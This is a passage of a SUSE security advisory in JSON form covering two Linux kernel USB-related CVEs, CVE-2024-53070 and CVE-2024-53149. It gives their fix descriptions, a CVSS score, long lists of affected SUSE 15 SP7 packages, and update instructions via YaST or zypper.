"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53070"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: dwc3: fix fault at system suspend if device was already runtime suspended\n\nIf the device was already runtime suspended then during system suspend\nwe cannot access the device registers else it will crash.\n\nAlso we cannot access any registers after dwc3_core_exit() on some\nplatforms so move the dwc3_enable_susphy() call to the top.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53070",
"url": "https://www.suse.com/security/cve/CVE-2024-53070"
},
{
"category": "external",
"summary": "SUSE Bug 1233563 for CVE-2024-53070",
"url": "https://bugzilla.suse.com/1233563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2024-53070"
},
{
"cve": "CVE-2024-53149",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53149"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nusb: typec: ucsi: glink: fix off-by-one in connector_status\n\nUCSI connector\u0027s indices start from 1 up to 3, PMIC_GLINK_MAX_PORTS.\nCorrect the condition in the pmic_glink_ucsi_connector_status()\ncallback, fixing Type-C orientation reporting for the third USB-C\nconnector.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-53149",
"url": "https://www.suse.com/security/cve/CVE-2024-53149"
},
{
"category": "external",
"summary": "SUSE Bug 1234842 for CVE-2024-53149",
"url": "https://bugzilla.suse.com/1234842"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
